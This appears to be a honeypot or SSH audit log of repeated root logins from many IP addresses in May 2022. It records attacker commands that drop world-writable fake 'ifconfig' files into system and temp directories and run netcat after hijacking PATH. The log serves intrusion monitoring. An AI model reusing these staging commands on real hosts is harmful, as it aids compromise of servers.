Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 187.6.3.3 17-May-2022 19:55:01 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 36.153.85.51 17-May-2022 20:38:25 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 14.36.38.99 17-May-2022 21:02:18 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec (uname -smr || /bin/uname -smr || /usr/bin/uname -smr)
(uname -smr || /bin/uname -smr || /usr/bin/uname -smr)

From 124.223.208.121 17-May-2022 21:10:33 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 45.179.91.154 17-May-2022 21:23:47 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 185.210.144.122 17-May-2022 21:37:16 ssh2 root
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 139.59.135.142 17-May-2022 21:37:27 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 36.153.85.51 17-May-2022 21:47:14 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 222.110.210.66 17-May-2022 21:47:41 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 193.194.91.166 17-May-2022 21:55:20 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 5.28.139.161 17-May-2022 22:04:41 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 83.66.33.75 17-May-2022 22:19:21 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 173.82.30.96 17-May-2022 22:28:40 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 92.205.21.38 17-May-2022 22:35:09 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 223.171.91.161 17-May-2022 22:42:19 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 31.223.111.253 17-May-2022 22:47:50 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 175.178.251.145 17-May-2022 22:54:19 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 84.23.32.54 17-May-2022 23:29:35 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 144.217.5.204 17-May-2022 23:29:52 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 147.182.233.56 17-May-2022 23:30:06 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 52.131.32.110 17-May-2022 23:30:12 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 139.209.222.134 17-May-2022 23:30:25 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 84.204.148.99 17-May-2022 23:37:55 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 173.19.149.215 17-May-2022 23:52:50 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 31.19.237.170 18-May-2022 00:00:33 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 223.171.91.149 18-May-2022 00:10:45 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 147.182.233.56 18-May-2022 00:40:57 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 209.216.177.238 18-May-2022 00:46:51 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 223.171.91.150 18-May-2022 00:55:07 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 125.94.202.100 18-May-2022 01:08:24 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 117.54.14.169 18-May-2022 01:12:57 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 129.154.55.234 18-May-2022 01:29:13 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 64.98.86.50 18-May-2022 01:32:22 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig

From 38.75.229.170 18-May-2022 01:32:22 ssh2 root
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 13.87.67.199 18-May-2022 01:38:26 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 160.120.129.184 18-May-2022 01:42:33 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 223.99.166.104 18-May-2022 01:42:50 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 71.131.225.150 18-May-2022 01:43:12 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 159.65.242.113 18-May-2022 01:52:36 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
